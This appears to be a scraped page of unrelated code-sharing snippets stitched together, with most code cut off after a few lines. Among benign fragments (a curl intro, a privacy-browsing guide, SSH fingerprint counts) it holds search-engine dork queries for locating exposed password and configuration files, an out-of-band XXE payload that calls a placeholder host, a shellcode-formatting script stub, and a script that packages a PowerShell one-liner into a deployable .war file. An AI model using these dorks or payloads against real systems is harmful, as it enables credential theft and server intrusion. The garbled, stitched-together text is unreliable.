Use the curl command line tool from your terminal window to access web pages, resources, and API's. This swiss-army knife of the internet also supports many more protocols and tools.
curl [options] URL
The complete, offical reference page is here.
| admin account info" filetype:log | |
| !Host=*.* intext:enc_UserPassword=* ext:pcf | |
| "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
| "AutoCreate=TRUE password=*" | |
| "http://*:*@www” domainname | |
| "index of/" "ws_ftp.ini" "parent directory" | |
| "liveice configuration file" ext:cfg -site:sourceforge.net | |
| "parent directory" +proftpdpasswd | |
| Duclassified" -site:duware.com "DUware All Rights reserved" | |
| duclassmate" -site:duware.com |
WebSockets is a modern HTML5 standard which makes communication between client and server a lot more simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time but usually the communication over the browser has been restricted. The general restrictions
| #!/usr/bin/env python | |
| import sys | |
| if __name__ == "__main__": | |
| if len(sys.argv) < 2: | |
| print "usage: %s file.bin\n" % (sys.argv[0],) | |
| sys.exit(0) | |
| shellcode = "\"" | |
| ctr = 1 | |
| maxlen = 15 |
| # OSX for Hackers (Mavericks/Yosemite) | |
| # | |
| # Source: https://gist.github.com/brandonb927/3195465 | |
| #!/bin/sh | |
| # Some things taken from here | |
| # https://github.com/mathiasbynens/dotfiles/blob/master/.osx | |
| # Ask for the administrator password upfront |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| # OSX for Pentesting (Mavericks/Yosemite) | |
| # | |
| # A fork of OSX for Hackers (Original Source: https://gist.github.com/brandonb927/3195465) | |
| #!/bin/sh | |
| # Ask for the administrator password upfront | |
| echo "Have you read through the script prior to running this? (y or n)" | |
| read bcareful |
| dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0 | 245272 | |
|---|---|---|
| 32:f9:38:a2:39:d0:c5:f5:ba:bd:b7:75:2b:00:f6:ab | 197846 | |
| d0:db:8a:cb:74:c8:37:e4:9e:71:fc:7a:eb:d6:40:81 | 152046 | |
| 34:47:0f:e9:1a:c2:eb:56:eb:cc:58:59:3a:02:80:b6 | 140777 | |
| df:17:d6:57:7a:37:00:7a:87:5e:4e:ed:2f:a3:d5:dd | 91904 | |
| 81:96:a6:8c:3a:75:f3:be:84:5e:cc:99:a7:ab:3e:d9 | 80499 | |
| 7c:a8:25:21:13:a2:eb:00:a6:c1:76:ca:6b:48:6e:bf | 78172 | |
| 1c:1e:29:43:d2:0c:c1:75:40:05:30:03:d4:02:d7:9b | 71851 | |
| 8b:75:88:08:41:78:11:5b:49:68:11:42:64:12:6d:49 | 70786 | |
| c2:77:c8:c5:72:17:e2:5b:4f:a2:4e:e3:04:0c:35:c9 | 68654 |
The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.
I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.
| #!/usr/bin/python | |
| # Code that quickly generates a deployable .war for a PowerShell one-liner | |
| import zipfile | |
| import StringIO | |
| import sys | |
| def generatePsWar(psCmd, appName): |
